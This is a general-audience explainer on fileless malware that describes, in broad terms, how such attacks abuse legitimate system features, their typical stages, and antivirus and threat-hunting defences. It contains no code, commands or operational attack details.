For most of tech history, malware attacks have involved malicious files finding their way onto a victim’s computer and wreaking havoc. In the early days, files were shared via floppy disk or compact disk, and today, they are more often transmitted via internet or the occasional corrupted flash drive. Antivirus tools have long functioned by identifying a malicious file, ideally before it deploys its attack, and quarantining the file before deleting it. Because malicious files tend to have obvious markers, computer antivirus solutions are remarkably effective at keeping users safe.
However, that might not be the case for long. A new type of fileless malware is growing in popularity, and many antivirus tools are not equipped to protect devices or data from these new malware attacks. Here’s what all users should know about fileless malware and what they can do to remain secure into the future.
How Does Fileless Malware Work?
Cybercriminals create traditional malware by developing purpose-built programs to attack systems and users in specific ways. Fileless malware, on the other hand, involves taking advantage of native, legitimate programs or features that already exist within a computing system, which means attackers do not need to install new code on devices or networks. Still, access to a user’s device is still mandatory for cybercriminals to launch a fileless attack, and to accomplish this, cybercriminals will use more typical cyberattack tools, such as:
Exploit kits, which are tools that identify and utilize vulnerabilities in certain systems or programs. Older and out-of-date software is more likely to have vulnerabilities that can be utilized with exploit kits.
Registry resident malware, which is traditional malware that installs files within the Windows registry, where it can more effectively evade detection and remain persistent.
Memory-only malware, which resides exclusively in a device’s memory, which makes it more difficult to detect.
Stolen credentials, which can be obtained through phishing, social engineering and other methods.
What Are the Stages of a Fileless Malware Attack?
Because preexisting code is used to launch the attack, traditional antivirus solutions are not as adept at recognizing signs of an attack and intervening before damage is done. Users can and should upgrade to premium antivirus options that offer more advanced digital protection from emerging threats like fileless malware — but they might also take the time to learn the stages of a fileless malware attack, so they might take steps to keep their devices, networks and data safe when and if a fileless attack occurs.
A typical fileless malware attack proceeds as follows:
Stage 1: Access. The attacker uses various techniques to gain access to a user’s system.
Stage 2: Credentials. The attacker looks for credentials that allow easier movement to other systems in the environment.
Stage 3: Persistence. The attacker creates a backdoor that allows them to return to the environment at will, without repeating the above stages of the attack.
Stage 4: Data. Finally, the attacker identifies, gathers and relocates valuable data from a user’s system.
Any or all of these stages could involve exploiting legitimate programs or utilizing native features of a device or system.
Are Any Antivirus Tools Useful Against Fileless Malware?
As mentioned above, more robust antivirus tools are capable of defending against fileless attacks because they have multiple methods of identifying threats. While simpler antivirus solutions might only look for indicators of compromise — which tell the system that an attack has already been executed — premium cybersecurity focuses on indicators of attack (IOAs), which involve signs that an attack is currently in progress. IOAs strive to identify sequences of actions that are often involved in a cyberattack; unlike more traditional methods of identifying malware, IOAs look for the intent behind certain digital behaviors, which can help systems using IOAs to protect against a broader range of attack methods.
Larger organizations with bigger cybersecurity budgets might invest in managed threat hunting, which is a data-intensive strategy that involves monitoring the environment, paying attention to the subtlest activities and searching proactively for intrusions. However, the average home user should be able to stay relatively safe with a more sophisticated antivirus tool.
The advent of fileless malware does not spell the end of traditional malware techniques, but it does mean that users need to update their cybersecurity to ensure that they remain protected against this new attack strategy into the future.